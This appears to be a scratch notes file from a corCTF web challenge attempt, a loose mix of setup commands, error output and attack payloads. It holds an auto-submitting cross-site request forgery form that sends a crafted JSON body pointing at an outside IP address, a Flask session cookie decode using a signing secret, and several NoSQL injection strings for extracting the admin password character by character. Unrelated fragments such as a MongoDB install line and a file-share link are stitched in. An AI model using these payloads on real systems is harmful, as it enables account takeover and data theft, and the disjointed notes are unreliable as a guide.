npm init
npm install --dependencies
npm install sqlite3
node app

application/json
{
	"flag":  "corCTF",
    "user": {
        "user":"a",
        "money":1e+700,
        "flags":[]
    }
}

tail -f /var/log/apache2/access.log

http://47.94.0.250/xss.php


<body onload="document.forms[0].submit()">
        <form method='POST' enctype='text/plain' action="https://phpme.be.ax/">
        <input name='{ "yep": "yep yep yep", "url": "http://47.94.0.250/", "=":" ' value='"}'>
        <input type="Submit">
        </form>
</body>



python3 flask_session_cookie_manager3.py decode -c "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJhIiwiZXhwIjoxNjI5ODgxOTI3LCJpYXQiOjE2Mjk4NjAzMjd9.oCd3GeWfu0McUCkSzx9hgmQjBUg2hbswLJGBRX1hM8g" -s "dcff3f05f289a18d6598886b28cbd9947b806cd5021d07a557d4237551381b96"


", "yep": "yep yep yep", "url": "https://webhook/"}

{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}


C:\mongo\bin\mongod --dbpath=c:\ db --logpath=c:\mongo\logs\mongodb.log --install

https://pan.baidu.com/s/1wNv-d0FciF7H4yHJGhSnIg#list/path=%2F

(node:1479226) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1)

6991d030f39a0693a1830473b63239f012312" || this.isAdmin==true && password[0]="R" "1"=="1


6991d030f39a0693a1830473b63239f012312" || this.isAdmin==true && password[0]="R" "1"=="1

6991d030f39a0693a1830473b63239f012312" || this.isAdmin==true && this.password[0]=="b" && "1"=="1

6991d030f39a0693a1830473b63239f012312" || this.isAdmin==true && this.password[0]=="b" &&"1"=="1

15f65b0dd2a4ccd5862e588bc7c5d42b" || (this.username == "admin" && this.password.charCodeAt({}) > {}) && "1"=="1


15f65b0dd2a4ccd5862e588bc7c5d42b" || (this.username == "admin" && this.password.charCodeAt(0) > {}) && "1"=="1


abcdefghijklmnopqrstuvwxyz0123456789



